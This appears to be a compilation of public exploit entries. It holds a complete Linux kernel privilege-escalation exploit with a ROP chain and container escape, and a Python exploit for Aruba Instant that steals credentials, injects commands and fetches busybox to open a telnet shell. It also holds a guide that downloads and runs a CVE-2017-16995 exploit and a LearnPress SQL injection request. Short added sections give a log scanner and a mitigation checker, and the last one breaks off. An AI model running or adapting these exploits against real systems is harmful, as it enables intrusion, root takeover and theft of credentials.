  struct __attribute__((__packed__)) {
    struct ipt_replace replace;
    struct ipt_entry entry;
    struct xt_entry_match match;
    char pad[0x108 + PRIMARY_SIZE - 0x200 - 0x2];
    struct xt_entry_target target;
  } data = {0};

  data.replace.num_counters = 1;
  data.replace.num_entries = 1;
  data.replace.size = (sizeof(data.entry) + sizeof(data.match) + sizeof(data.pad) + sizeof(data.target));

  data.entry.next_offset = (sizeof(data.entry) + sizeof(data.match) + sizeof(data.pad) + sizeof(data.target));
  data.entry.target_offset = (sizeof(data.entry) + sizeof(data.match) + sizeof(data.pad));

  data.match.u.user.match_size = (sizeof(data.match) + sizeof(data.pad));
  strcpy(data.match.u.user.name, "icmp");
  data.match.u.user.revision = 0;

  data.target.u.user.target_size = sizeof(data.target);
  strcpy(data.target.u.user.name, "NFQUEUE");
  data.target.u.user.revision = 1;

  // Partially overwrite the adjacent buffer with 2 bytes of zero.
  if (setsockopt(s, SOL_IP, IPT_SO_SET_REPLACE, &data, sizeof(data)) != 0) {
    if (errno == ENOPROTOOPT) {
      printf("[-] Error ip_tables module is not loaded.\n");
      return -1;
    }
  }

  return 0;
}

// Note: Must not touch offset 0x10-0x18.
void build_krop(char *buf, uint64_t kbase_addr, uint64_t scratchpad_addr) {
  uint64_t *rop;

#ifdef KERNEL_COS_5_4_89
  *(uint64_t *)&buf[0x00] = kbase_addr + POP_RSP_POP_RBX_RET;

  rop = (uint64_t *)&buf[0x18];

  // Save RBP at scratchpad_addr.
  *rop++ = kbase_addr + ENTER_0_0_POP_RBX_POP_R14_POP_RBP_RET;
  *rop++ = scratchpad_addr;  // R14
  *rop++ = 0xDEADBEEF;       // RBP
  *rop++ = kbase_addr + MOV_QWORD_PTR_R14_RBX_POP_RBX_POP_R14_POP_RBP_RET;
  *rop++ = 0xDEADBEEF;  // RBX
  *rop++ = 0xDEADBEEF;  // R14
  *rop++ = 0xDEADBEEF;  // RBP

  // commit_creds(prepare_kernel_cred(NULL))
  *rop++ = kbase_addr + POP_RDI_RET;
  *rop++ = 0;  // RDI
  *rop++ = kbase_addr + PREPARE_KERNEL_CRED;
  *rop++ = kbase_addr + POP_RDX_RET;
  *rop++ = 1;  // RDX
  *rop++ = kbase_addr + CMP_RDX_1_JNE_POP_RBP_RET;
  *rop++ = 0xDEADBEEF;  // RBP
  *rop++ = kbase_addr + MOV_RDI_RAX_JNE_POP_RBP_RET;
  *rop++ = 0xDEADBEEF;  // RBP
  *rop++ = kbase_addr + COMMIT_CREDS;

  // switch_task_namespaces(find_task_by_vpid(1), init_nsproxy)
  *rop++ = kbase_addr + POP_RDI_RET;
  *rop++ = 1;  // RDI
  *rop++ = kbase_addr + FIND_TASK_BY_VPID;
  *rop++ = kbase_addr + POP_RDX_RET;
  *rop++ = 1;  // RDX
  *rop++ = kbase_addr + CMP_RDX_1_JNE_POP_RBP_RET;
  *rop++ = 0xDEADBEEF;  // RBP
  *rop++ = kbase_addr + MOV_RDI_RAX_JNE_POP_RBP_RET;
  *rop++ = 0xDEADBEEF;  // RBP
  *rop++ = kbase_addr + POP_RSI_RET;
  *rop++ = kbase_addr + INIT_NSPROXY;  // RSI
  *rop++ = kbase_addr + SWITCH_TASK_NAMESPACES;

  // Load RBP from scratchpad_addr and resume execution.
  *rop++ = kbase_addr + POP_RBP_RET;
  *rop++ = scratchpad_addr - 0x25;  // RBP
  *rop++ = kbase_addr + PUSH_QWORD_PTR_RBP_25_POP_RBP_RET;
  *rop++ = kbase_addr + MOV_RSP_RBP_POP_RBP_RET;
#elif KERNEL_UBUNTU_5_8_0_48
  *(uint64_t *)&buf[0x39] = kbase_addr + POP_RSP_RET;
  *(uint64_t *)&buf[0x00] = kbase_addr + ADD_RSP_D0_RET;

  rop = (uint64_t *)&buf[0xD8];

  // Save RBP at scratchpad_addr.
  *rop++ = kbase_addr + ENTER_0_0_POP_RBX_POP_R12_POP_RBP_RET;
  *rop++ = scratchpad_addr;  // R12
  *rop++ = 0xDEADBEEF;       // RBP
  *rop++ = kbase_addr + MOV_QWORD_PTR_R12_RBX_POP_RBX_POP_R12_POP_RBP_RET;
  *rop++ = 0xDEADBEEF;  // RBX
  *rop++ = 0xDEADBEEF;  // R12
  *rop++ = 0xDEADBEEF;  // RBP

  // commit_creds(prepare_kernel_cred(NULL))
  *rop++ = kbase_addr + POP_RDI_RET;
  *rop++ = 0;  // RDI
  *rop++ = kbase_addr + PREPARE_KERNEL_CRED;
  *rop++ = kbase_addr + POP_RCX_RET;
  *rop++ = 4;  // RCX
  *rop++ = kbase_addr + CMP_RCX_4_JNE_POP_RBP_RET;
  *rop++ = 0xDEADBEEF;  // RBP
  *rop++ = kbase_addr + MOV_RDI_RAX_JNE_XOR_EAX_EAX_RET;
  *rop++ = kbase_addr + COMMIT_CREDS;

  // switch_task_namespaces(find_task_by_vpid(1), init_nsproxy)
  *rop++ = kbase_addr + POP_RDI_RET;
  *rop++ = 1;  // RDI
  *rop++ = kbase_addr + FIND_TASK_BY_VPID;
  *rop++ = kbase_addr + POP_RCX_RET;
  *rop++ = 4;  // RCX
  *rop++ = kbase_addr + CMP_RCX_4_JNE_POP_RBP_RET;
  *rop++ = 0xDEADBEEF;  // RBP
  *rop++ = kbase_addr + MOV_RDI_RAX_JNE_XOR_EAX_EAX_RET;
  *rop++ = kbase_addr + POP_RSI_RET;
  *rop++ = kbase_addr + INIT_NSPROXY;  // RSI
  *rop++ = kbase_addr + SWITCH_TASK_NAMESPACES;

  // Load RBP from scratchpad_addr and resume execution.
  *rop++ = kbase_addr + POP_RBP_RET;
  *rop++ = scratchpad_addr - 0xA;  // RBP
  *rop++ = kbase_addr + PUSH_QWORD_PTR_RBP_A_POP_RBP_RET;
  *rop++ = kbase_addr + MOV_RSP_RBP_POP_RBP_RET;
#endif
}

int setup_sandbox(void) {
  if (unshare(CLONE_NEWUSER) < 0) {
    perror("[-] unshare(CLONE_NEWUSER)");
    return -1;
  }

  if (unshare(CLONE_NEWNET) < 0) {
    perror("[-] unshare(CLONE_NEWNET)");
    return -1;
  }

  cpu_set_t set;
  CPU_ZERO(&set);
  CPU_SET(0, &set);
  if (sched_setaffinity(getpid(), sizeof(set), &set) < 0) {
    perror("[-] sched_setaffinity");
    return -1;
  }

  return 0;
}

int main(int argc, char *argv[]) {
  int s;
  int fd;
  int ss[NUM_SOCKETS][2];
  int pipefd[NUM_PIPEFDS][2];
  int msqid[NUM_MSQIDS];

  char primary_buf[PRIMARY_SIZE - SKB_SHARED_INFO_SIZE];
  char secondary_buf[SECONDARY_SIZE - SKB_SHARED_INFO_SIZE];

  struct msg_msg *msg;
  struct pipe_buf_operations *ops;
  struct pipe_buffer *buf;

  uint64_t pipe_buffer_ops = 0;
  uint64_t kheap_addr = 0, kbase_addr = 0;

  int fake_idx = -1, real_idx = -1;

  printf("[+] Linux Privilege Escalation by theflow@ - 2021\n");

  printf("\n");

  printf("[+] STAGE 0: Initialization\n");

  printf("[*] Setting up namespace sandbox...\n");
  if (setup_sandbox() < 0)
    goto err_no_rmid;

  printf("[*] Initializing sockets and message queues...\n");

  if ((s = socket(AF_INET, SOCK_STREAM, 0)) < 0) {
    perror("[-] socket");
    goto err_no_rmid;
  }

  for (int i = 0; i < NUM_SOCKETS; i++) {
    if (socketpair(AF_UNIX, SOCK_STREAM, 0, ss[i]) < 0) {
      perror("[-] socketpair");
      goto err_no_rmid;
    }
  }

  for (int i = 0; i < NUM_MSQIDS; i++) {
    if ((msqid[i] = msgget(IPC_PRIVATE, IPC_CREAT | 0666)) < 0) {
      perror("[-] msgget");
      goto err_no_rmid;
    }
  }

  printf("\n");

  printf("[+] STAGE 1: Memory corruption\n");

  printf("[*] Spraying primary messages...\n");
  for (int i = 0; i < NUM_MSQIDS; i++) {
    memset(&msg_primary, 0, sizeof(msg_primary));
    *(int *)&msg_primary.mtext[0] = MSG_TAG;
    *(int *)&msg_primary.mtext[4] = i;
    if (write_msg(msqid[i], &msg_primary, sizeof(msg_primary), MTYPE_PRIMARY) < 0)
      goto err_rmid;
  }

  printf("[*] Spraying secondary messages...\n");
  for (int i = 0; i < NUM_MSQIDS; i++) {
    memset(&msg_secondary, 0, sizeof(msg_secondary));
    *(int *)&msg_secondary.mtext[0] = MSG_TAG;
    *(int *)&msg_secondary.mtext[4] = i;
    if (write_msg(msqid[i], &msg_secondary, sizeof(msg_secondary), MTYPE_SECONDARY) < 0)
      goto err_rmid;
  }

  printf("[*] Creating holes in primary messages...\n");
  for (int i = HOLE_STEP; i < NUM_MSQIDS; i += HOLE_STEP) {
    if (read_msg(msqid[i], &msg_primary, sizeof(msg_primary), MTYPE_PRIMARY) < 0)
      goto err_rmid;
  }

  printf("[*] Triggering out-of-bounds write...\n");
  if (trigger_oob_write(s) < 0)
    goto err_rmid;

  printf("[*] Searching for corrupted primary message...\n");
  for (int i = 0; i < NUM_MSQIDS; i++) {
    if (i != 0 && (i % HOLE_STEP) == 0)
      continue;
    if (peek_msg(msqid[i], &msg_secondary, sizeof(msg_secondary), 1) < 0)
      goto err_no_rmid;
    if (*(int *)&msg_secondary.mtext[0] != MSG_TAG) {
      printf("[-] Error could not corrupt any primary message.\n");
      goto err_no_rmid;
    }
    if (*(int *)&msg_secondary.mtext[4] != i) {
      fake_idx = i;
      real_idx = *(int *)&msg_secondary.mtext[4];
      break;
    }
  }

  if (fake_idx == -1 && real_idx == -1) {
    printf("[-] Error could not corrupt any primary message.\n");
    goto err_no_rmid;
  }

  // fake_idx's primary message has a corrupted next pointer; wrongly
  // pointing to real_idx's secondary message.

  printf("[+] fake_idx: %x\n", fake_idx);
  printf("[+] real_idx: %x\n", real_idx);

  printf("\n");

  printf("[+] STAGE 2: SMAP bypass\n");

  printf("[*] Freeing real secondary message...\n");
  if (read_msg(msqid[real_idx], &msg_secondary, sizeof(msg_secondary), MTYPE_SECONDARY) < 0)
    goto err_rmid;

  // Reclaim the previously freed secondary message with a fake msg_msg of
  // maximum possible size.
  printf("[*] Spraying fake secondary messages...\n");
  memset(secondary_buf, 0, sizeof(secondary_buf));
  build_msg_msg((void *)secondary_buf, 0x41414141, 0x42424242, PAGE_SIZE - MSG_MSG_SIZE, 0);
  if (spray_skbuff(ss, secondary_buf, sizeof(secondary_buf)) < 0)
    goto err_rmid;

  // Use the fake secondary message to read out-of-bounds.
  printf("[*] Leaking adjacent secondary message...\n");
  if (peek_msg(msqid[fake_idx], &msg_fake, sizeof(msg_fake), 1) < 0)
    goto err_rmid;

  // Check if the leak is valid.
  if (*(int *)&msg_fake.mtext[SECONDARY_SIZE] != MSG_TAG) {
    printf("[-] Error could not leak adjacent secondary message.\n");
    goto err_rmid;
  }

  // The secondary message contains a pointer to the primary message.
  msg = (struct msg_msg *)&msg_fake.mtext[SECONDARY_SIZE - MSG_MSG_SIZE];
  kheap_addr = msg->m_list_next;
  if (kheap_addr & (PRIMARY_SIZE - 1))
    kheap_addr = msg->m_list_prev;

  printf("[+] kheap_addr: %" PRIx64 "\n", kheap_addr);

  if ((kheap_addr & 0xFFFF000000000000) != 0xFFFF000000000000) {
    printf("[-] Error kernel heap address is incorrect.\n");
    goto err_rmid;
  }

  printf("[*] Freeing fake secondary messages...\n");
  free_skbuff(ss, secondary_buf, sizeof(secondary_buf));

  // Put kheap_addr at next to leak its content. Assumes zero bytes before
  // kheap_addr.
  printf("[*] Spraying fake secondary messages...\n");
  memset(secondary_buf, 0, sizeof(secondary_buf));
  build_msg_msg((void *)secondary_buf, 0x41414141, 0x42424242, sizeof(msg_fake.mtext), kheap_addr - MSG_MSGSEG_SIZE);
  if (spray_skbuff(ss, secondary_buf, sizeof(secondary_buf)) < 0)
    goto err_rmid;

  // Use the fake secondary message to read from kheap_addr.
  printf("[*] Leaking primary message...\n");
  if (peek_msg(msqid[fake_idx], &msg_fake, sizeof(msg_fake), 1) < 0)
    goto err_rmid;

  // Check if the leak is valid.
  if (*(int *)&msg_fake.mtext[PAGE_SIZE] != MSG_TAG) {
    printf("[-] Error could not leak primary message.\n");
    goto err_rmid;
  }

  // The primary message contains a pointer to the secondary message.
  msg = (struct msg_msg *)&msg_fake.mtext[PAGE_SIZE - MSG_MSG_SIZE];
  kheap_addr = msg->m_list_next;
  if (kheap_addr & (SECONDARY_SIZE - 1))
    kheap_addr = msg->m_list_prev;

  // Calculate the address of the fake secondary message.
  kheap_addr -= SECONDARY_SIZE;

  printf("[+] kheap_addr: %" PRIx64 "\n", kheap_addr);

  if ((kheap_addr & 0xFFFF00000000FFFF) != 0xFFFF000000000000) {
    printf("[-] Error kernel heap address is incorrect.\n");
    goto err_rmid;
  }

  printf("\n");

  printf("[+] STAGE 3: KASLR bypass\n");

  printf("[*] Freeing fake secondary messages...\n");
  free_skbuff(ss, secondary_buf, sizeof(secondary_buf));

  // Put kheap_addr at m_list_next & m_list_prev so that list_del() is possible.
  printf("[*] Spraying fake secondary messages...\n");
  memset(secondary_buf, 0, sizeof(secondary_buf));
  build_msg_msg((void *)secondary_buf, kheap_addr, kheap_addr, 0, 0);
  if (spray_skbuff(ss, secondary_buf, sizeof(secondary_buf)) < 0)
    goto err_rmid;

  printf("[*] Freeing sk_buff data buffer...\n");
  if (read_msg(msqid[fake_idx], &msg_fake, sizeof(msg_fake), MTYPE_FAKE) < 0)
    goto err_rmid;

  printf("[*] Spraying pipe_buffer objects...\n");
  for (int i = 0; i < NUM_PIPEFDS; i++) {
    if (pipe(pipefd[i]) < 0) {
      perror("[-] pipe");
      goto err_rmid;
    }
    // Write something to populate pipe_buffer.
    if (write(pipefd[i][1], "pwn", 3) < 0) {
      perror("[-] write");
      goto err_rmid;
    }
  }

  printf("[*] Leaking and freeing pipe_buffer object...\n");
  for (int i = 0; i < NUM_SOCKETS; i++) {
    for (int j = 0; j < NUM_SKBUFFS; j++) {
      if (read(ss[i][1], secondary_buf, sizeof(secondary_buf)) < 0) {
        perror("[-] read");
        goto err_rmid;
      }
      if (*(uint64_t *)&secondary_buf[0x10] != MTYPE_FAKE)
        pipe_buffer_ops = *(uint64_t *)&secondary_buf[0x10];
    }
  }

  kbase_addr = pipe_buffer_ops - ANON_PIPE_BUF_OPS;

  printf("[+] anon_pipe_buf_ops: %" PRIx64 "\n", pipe_buffer_ops);
  printf("[+] kbase_addr: %" PRIx64 "\n", kbase_addr);

  if ((kbase_addr & 0xFFFF0000000FFFFF) != 0xFFFF000000000000) {
    printf("[-] Error kernel base address is incorrect.\n");
    goto err_rmid;
  }

  printf("\n");

  printf("[+] STAGE 4: Kernel code execution\n");

  printf("[*] Spraying fake pipe_buffer objects...\n");
  memset(secondary_buf, 0, sizeof(secondary_buf));
  buf = (struct pipe_buffer *)&secondary_buf;
  buf->ops = kheap_addr + 0x290;
  ops = (struct pipe_buf_operations *)&secondary_buf[0x290];
#ifdef KERNEL_COS_5_4_89
  // RAX points to &buf->ops.
  // RCX points to &buf.
  ops->release = kbase_addr + PUSH_RAX_JMP_QWORD_PTR_RCX;
#elif KERNEL_UBUNTU_5_8_0_48
  // RSI points to &buf.
  ops->release = kbase_addr + PUSH_RSI_JMP_QWORD_PTR_RSI_39;
#endif
  build_krop(secondary_buf, kbase_addr, kheap_addr + 0x2B0);
  if (spray_skbuff(ss, secondary_buf, sizeof(secondary_buf)) < 0)
    goto err_rmid;

  // Trigger pipe_release().
  printf("[*] Releasing pipe_buffer objects...\n");
  for (int i = 0; i < NUM_PIPEFDS; i++) {
    if (close(pipefd[i][0]) < 0) {
      perror("[-] close");
      goto err_rmid;
    }
    if (close(pipefd[i][1]) < 0) {
      perror("[-] close");
      goto err_rmid;
    }
  }

  printf("[*] Checking for root...\n");
  if ((fd = open("/etc/shadow", O_RDONLY)) < 0) {
    printf("[-] Error could not gain root privileges.\n");
    goto err_rmid;
  }
  close(fd);

  printf("[+] Root privileges gained.\n");

  printf("\n");

  printf("[+] STAGE 5: Post-exploitation\n");

  printf("[*] Escaping container...\n");
  setns(open("/proc/1/ns/mnt", O_RDONLY), 0);
  setns(open("/proc/1/ns/pid", O_RDONLY), 0);
  setns(open("/proc/1/ns/net", O_RDONLY), 0);

  printf("[*] Cleaning up...\n");
  for (int i = 0; i < NUM_MSQIDS; i++) {
    // TODO: Fix next pointer.
    if (i == fake_idx)
      continue;
    if (msgctl(msqid[i], IPC_RMID, NULL) < 0)
      perror("[-] msgctl");
  }

  for (int i = 0; i < NUM_SOCKETS; i++) {
    if (close(ss[i][0]) < 0)
      perror("[-] close");
    if (close(ss[i][1]) < 0)
      perror("[-] close");
  }

  if (close(s) < 0)
    perror("[-] close");

  printf("[*] Popping root shell...\n");
  char *args[] = {"/bin/bash", "-i", NULL};
  execve(args[0], args, NULL);

  return 0;

err_rmid:
  for (int i = 0; i < NUM_MSQIDS; i++) {
    if (i == fake_idx)
      continue;
    if (msgctl(msqid[i], IPC_RMID, NULL) < 0)
      perror("[-] msgctl");
  }

err_no_rmid:
  return 1;
}
-
Aruba Instant 8.7.1.0 - Arbitrary File Modification
# Exploit Title: Aruba Instant 8.7.1.0 - Arbitrary File Modification
# Date: 15/07/2021
# Exploit Author: Gr33nh4t
# Vendor Homepage: https://www.arubanetworks.com/
# Version:
# Aruba Instant 6.4.x: 6.4.4.8-4.2.4.17 and below
# Aruba Instant 6.5.x: 6.5.4.18 and below
# Aruba Instant 8.3.x: 8.3.0.14 and below
# Aruba Instant 8.5.x: 8.5.0.11 and below
# Aruba Instant 8.6.x: 8.6.0.6 and below
# Aruba Instant 8.7.x: 8.7.1.0 and below
# Tested on: Aruba Instant
# CVE : CVE-2021-25155

import socket
import sys
import struct
import time
import threading
import urllib3
import re
import telnetlib
import xml.etree.ElementTree as ET
import requests

urllib3.disable_warnings()

CONTINUE_RACE = True
SNPRINTF_CREATEFILE_MAX_LENGTH = 245


def race_papi_message(ip):
    global CONTINUE_RACE
    payload = b"\x49\x72"
    payload += b"\x00\x03"
    payload += b"\x7F\x00\x00\x01"
    payload += b"\x7F\x00\x00\x01"
    payload += b"\x00\x00"
    payload += b"\x00\x00"
    payload += b"\x3B\x7E"
    payload += b"\x41\x41"
    payload += b"\x04\x22"
    payload += b"\x00\x00"
    payload += b"\x02\x00"
    payload += b"\x00\x00"
    payload += b"\x00" * 12 * 4

    text_to_send = bytes()
    for i in "msg_ref 3000 /tmp/cfg-plaintext\x00":
        text_to_send += struct.pack("B", int(ord(i)) ^ 0x93)

    packet = payload + text_to_send

    while CONTINUE_RACE:
        s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
        s.connect((ip, 8211))
        s.send(packet)
        s.close()
        time.sleep(0.004)


def find_credentials(text):
    res = re.search("mgmt-user .*", text)[0]
    res = res.split(" ")
    return (res[1], res[2])


def login(ip, username, password):
    login_data = {
        "opcode": "login",
        "user": username,
        "passwd": password,
        "refresh": "false",
    }
    res = requests.post("https://{}:4343/swarm.cgi".format(ip), data=login_data, verify=False)
    root = ET.fromstring(res.text)
    return root.find("./data[@name='sid']").text


def create_directory(ip, sid):
    request_data = "opcode=config&ip=127.0.0.1&cmd='end%20%0Aapply%20cplogo-install%20\"https://{ip}:4343/%09--directory-prefix%09/tmp/oper_/%09#\"'&refresh=false&sid={sid}&nocache=0.23759201691110987&=".format(ip=ip, sid=sid)
    res = requests.post("https://{}:4343/swarm.cgi".format(ip), data=request_data, verify=False)
    if "/tmp/oper_" in res.text:
        print("[+] Successfully created /tmp/oper_/ directory :)")
        return True
    else:
        print("[-] Failed creating /tmp/oper_/ directory")
        return False


def prepare_upload_id(command):
    base_payload = "/../../etc/httpd/"
    cmd_len = len(command)
    padding_len = SNPRINTF_CREATEFILE_MAX_LENGTH - cmd_len - len(base_payload) - 8  # for the .gz at the end and the '; + spaces
    if padding_len < 0:
        print("[-] Command too long length:{}".format(padding_len))
        exit(1)
    return base_payload + ('/' * (padding_len - 1)) + 'A' + "'; {} #.gz".format(command)


def create_file(ip, command):
    upload_id = prepare_upload_id(command)
    requests.post("https://{}:4343/swarm.cgi".format(ip), data={"opcode": "cp-upload", "file_type": "logo", "upload_id": upload_id, "sid": "basdfbsfbsfb"}, files={"file": "test2"}, verify=False)


def run_command(ip, command):
    print("[*] Executing telnet")
    command = command.replace("?", "%3F")
    command = command.replace("#", "\\\\x23")
    s = requests.Session()
    req = requests.Request('GET', "https://{}:4343/A';%20{}%20%23".format(ip, command))
    prep = req.prepare()
    response = s.send(prep, verify=False)
    return response.text


def build_command(command):
    command = command.replace("/", "\\\\x2F")
    command = command.replace("#", "\\\\x23")
    command = command.replace("\"", "\\\"")
    command = command.replace("`", "\`")
    final_command = "echo -e \"{}\"|sh".format(command)
    return final_command


def telnet_connect(router_ip):
    print("[*] Connecting to telnet")
    with telnetlib.Telnet(router_ip, 22222) as tn:
        tn.write(b"rm /etc/httpd/A*sh*.gz\n")
        tn.interact()


def main():
    global CONTINUE_RACE
    ip = sys.argv[1]
    print("[*] Starting the PAPI race thread")
    papi_thread = threading.Thread(target=race_papi_message, args=(ip, ))
    papi_thread.start()

    while CONTINUE_RACE:
        time.sleep(0.1)
        res = requests.get("https://{}:4343/swarm.cgi?opcode=single_signon&key=AAAA&ip=%20127.0.0.1".format(ip), timeout=3, verify=False)
        if "version" in res.text:
            print("[+] Successfully leaked the password from config")
            CONTINUE_RACE = False
            file_content = re.findall("var SESSION_ID = '(.*?)';", res.text, re.S)[0]
            user, password = find_credentials(file_content)
            print("[+] Successfully extracted username: {} and password: {}".format(user, password))

    sid = login(ip, user, password)
    print("[*] SID generated: {}".format(sid))

    command = """cd /tmp;/usr/sbin/wget https://busybox.net/downloads/binaries/1.21.1/busybox-armv5l --no-check-certificate -O telnetd;chmod +x telnetd;./telnetd -p 22222 -l sh"""
    final_command = build_command(command)

    if not create_directory(ip, sid):
        return

    print("[*] Creating malicious file in /etc/httpd/")
    create_file(ip, final_command)
    print(run_command(ip, final_command))
    time.sleep(1)  # Sleeping waiting for telnet.
    telnet_connect(ip)


if __name__ == "__main__":
    main()
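From the defender's side, the two HTTP steps of the chain above leave recognisable traces in the web server's access log: a single_signon call whose ip parameter is whitespace-padded loopback, followed by a GET whose path is shaped like a shell fragment. The scanner below is an added example, not part of the advisory; the common-log-format layout and the sample lines are constructed, not taken from an Aruba device.

```python
"""Flag access-log lines that match the request pattern of the chain above
(single_signon with a whitespace-padded loopback 'ip', then a GET path carrying
shell metacharacters). Added example; log format and sample lines are constructed."""
import re
from urllib.parse import parse_qs, unquote, urlsplit

LOG_RE = re.compile(r'^(?P<src>\S+) \S+ \S+ \[[^\]]+\] "[A-Z]+ (?P<target>\S+) \S+" \d{3}')


def suspicious_reasons(target):
    """Return why a request target looks like the chain above (empty if benign)."""
    reasons = []
    parts = urlsplit(target)
    qs = parse_qs(parts.query)  # decodes %20 -> ' ' for us
    if parts.path.endswith("/swarm.cgi") and qs.get("opcode") == ["single_signon"]:
        ip_val = qs.get("ip", [""])[0]
        # The exploit sends ip=%20127.0.0.1: real clients never pad the value
        # with whitespace or ask the device about its own loopback address.
        if ip_val != ip_val.strip() or ip_val.strip().startswith("127."):
            reasons.append("single_signon with padded/loopback ip parameter")
    path = unquote(parts.path)
    if "'" in path and ";" in path and "#" in path:  # shaped like /A'; <cmd> #
        reasons.append("shell metacharacters in URI path")
    return reasons


def scan_access_log(lines):
    """Return (line_no, source_ip, reasons) for every flagged line."""
    hits = []
    for n, line in enumerate(lines, 1):
        m = LOG_RE.match(line)
        if m:
            reasons = suspicious_reasons(m["target"])
            if reasons:
                hits.append((n, m["src"], reasons))
    return hits


# Constructed sample: a benign login, the two exploit requests, a static file.
SAMPLE_LOG = [
    '198.51.100.7 - - [15/Jul/2021:10:00:01 +0000] "GET /swarm.cgi?opcode=login HTTP/1.1" 200 512',
    '198.51.100.7 - - [15/Jul/2021:10:00:02 +0000] "GET /swarm.cgi?opcode=single_signon&key=AAAA&ip=%20127.0.0.1 HTTP/1.1" 200 4096',
    '198.51.100.7 - - [15/Jul/2021:10:00:05 +0000] "GET /A\';%20echo%20-e%20%22id%22%7Csh%20%23 HTTP/1.1" 200 17',
    '203.0.113.9 - - [15/Jul/2021:10:00:06 +0000] "GET /images/logo.png HTTP/1.1" 200 2210',
]

if __name__ == "__main__":
    for n, src, why in scan_access_log(SAMPLE_LOG):
        print("line %d from %s: %s" % (n, src, "; ".join(why)))
```

The PAPI race itself runs over UDP 8211 and never appears in the web log, so pair this with a network-level alert on unexpected traffic to that port.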
-
Title: CVE-2017-16995 Ubuntu 16.04 Local Privilege Escalation Vulnerability Reproduction
0x01 Introduction

This vulnerability was discovered by Google Project Zero. It is reported to exist in Linux kernels built with eBPF bpf(2) system call support (CONFIG_BPF_SYSCALL) and is an arbitrary memory read and write vulnerability. It is caused by a calculation error in the eBPF verifier module: a normal user can construct a special BPF program that triggers it, and a malicious attacker can use it to perform local privilege escalation.

0x02 Affected versions

Linux kernel 4.4 through 4.14 (affects Debian and Ubuntu distributions)

0x03 Test environment

Ubuntu 16.04 x64

0x04 Test steps

1. Download address of the privilege escalation exploit: http://Cyclabs.com/exploits/upstream44.c
2. Switch to the /opt directory and download the exp:
cd /opt  # Preparation: check that /opt has 777 permissions, otherwise the exp cannot be compiled and run
wget http://Cyclabs.com/exploits/upstream44.c
3. Some Ubuntu installations do not have gcc installed, so install it:
sudo apt-get install gcc
If compilation reports missing components, install the libc development package:
apt-get install libc6-dev
4. Then compile with gcc:
gcc -o exp upstream44.c
5. Make exp executable:
chmod +x exp
6. Run exp to escalate privileges:
./exp

0x05 Vulnerability fix

There is currently no definite patch upgrade plan. After assessing the risk, it is temporarily recommended to change a kernel parameter so that normal users are restricted from using the bpf(2) system call:
echo 1 > /proc/sys/kernel/unprivileged_bpf_disabled
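A quick way to verify the temporary mitigation across a fleet is to combine the kernel release with the state of the sysctl knob. The checker below is an added example, not part of the post; it assumes the /proc path given above and the 4.4 to 4.14 range the post names, and the sample values in the test are constructed.

```python
"""Check a host against the temporary mitigation above: parse the kernel release,
test whether it falls in the 4.4 to 4.14 range named in the post, and read
kernel.unprivileged_bpf_disabled. Added example, not from the post."""
import os
import re

AFFECTED_MIN, AFFECTED_MAX = (4, 4), (4, 14)
SYSCTL_PATH = "/proc/sys/kernel/unprivileged_bpf_disabled"


def parse_release(release):
    """'4.4.0-87-generic' -> (4, 4, 0); raises ValueError for unrecognised input."""
    m = re.match(r"(\d+)\.(\d+)(?:\.(\d+))?", release)
    if not m:
        raise ValueError("unrecognised kernel release: %r" % release)
    return tuple(int(x or 0) for x in m.groups())


def read_sysctl(path=SYSCTL_PATH):
    """Raw value of the knob, or '' if the kernel lacks it or it is unreadable."""
    try:
        with open(path) as fh:
            return fh.read()
    except OSError:
        return ""


def assess(release, sysctl_value):
    """Combine kernel version and knob state into a verdict dict."""
    ver = parse_release(release)
    in_range = AFFECTED_MIN <= ver[:2] <= AFFECTED_MAX
    # 1 disables bpf(2) for unprivileged users until reboot (cannot be undone);
    # newer kernels also accept 2, which disables it but can be switched back.
    restricted = sysctl_value.strip() in ("1", "2")
    return {
        "kernel": ver,
        "affected_range": in_range,
        "bpf_restricted": restricted,
        "action_needed": in_range and not restricted,
    }


if __name__ == "__main__":
    verdict = assess(os.uname().release, read_sysctl())
    print(verdict)
    if verdict["action_needed"]:
        print("mitigate: echo 1 > %s, then schedule the kernel update" % SYSCTL_PATH)
```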
-
WordPress Plugin LearnPress 3.2.6.7 - 'current_items' SQL Injection (Authenticated)
# Exploit Title: WordPress Plugin LearnPress 3.2.6.7 - 'current_items' SQL Injection (Authenticated)
# Date: 07-17-2021
# Exploit Author: nhattruong or nhattruong.blog
# Vendor Homepage: https://thimpress.com/learnpress/
# Software Link: https://wordpress.org/plugins/learnpress/
# Version: < 3.2.6.8
# References link: https://wpscan.com/vulnerability/10208
# CVE: CVE-2020-6010

POC:
1. Go to url http://<host>/wp-admin
2. Log in with valid credentials
3. Execute the payload

POST /wordpress/wp-admin/post-new.php?post_type=lp_order HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:89.0) Gecko/20100101 Firefox/89.0
Accept: application/json, text/plain, */*
Accept-Language: vi-VN,vi;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Referer: http://localhost/wordpress/wp-admin/post-new.php?post_type=lp_order
Content-Type: application/x-www-form-urlencoded
X-Requested-With: XMLHttpRequest
Content-Length: 128
Origin: http://localhost
Connection: close
Cookie: wordpress_bbfa5b726c6b7a9cf3cda9370be3ee91=test%7C1626703944%7Ch5yJTmZF2VUp6nuZHvt3WpWHJOGpYRUwaDfRNLd8N3x%7Cf0e96afd20e39e4531756b321160a4929f82f20a3fed8d3c3b682e0ece232e08; wordpress_test_cookie=WP+Cookie+check; wp_learn_press_session_bbfa5b726c6b7a9cf3cda9370be3ee91=80e1cb27266ae862f9e71f90a987f260%7C%7C1626703938%7C%7Cbd6b88d1ae5fd4354f09534ad4971bbc; wordpress_logged_in_bbfa5b726c6b7a9cf3cda9370be3ee91=test%7C1626703944%7Ch5yJTmZF2VUp6nuZHvt3WpWHJOGpYRUwaDfRNLd8N3x%7Ce1092ef2869397bd9701ca7f1c6d0399c89459f5221db89c48a53b39b3e8cc2f; wp-settings-time-3=1626531145

type=lp_course&context=order-items&context_id=32&term=+test&paged=1&lp-ajax=modal_search_items&current_items[]=1 or sleep(1)-- -

# Modify current_items[] as you want
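The root cause is an array parameter whose elements are expected to be integer IDs but are concatenated into the query as text. The pair of functions below is an added example, not LearnPress code: the query shape is assumed (the plugin's real SQL is not on this page), the table rows are constructed, and SQLite has no sleep(), so the injected value fails to parse instead of delaying; either way it reached the SQL parser, which is the defect.

```python
"""Vulnerable and hardened handling of an integer-array request parameter like
current_items[] above, on an in-memory SQLite table. Added example with an
assumed query shape; the rows are constructed."""
import sqlite3
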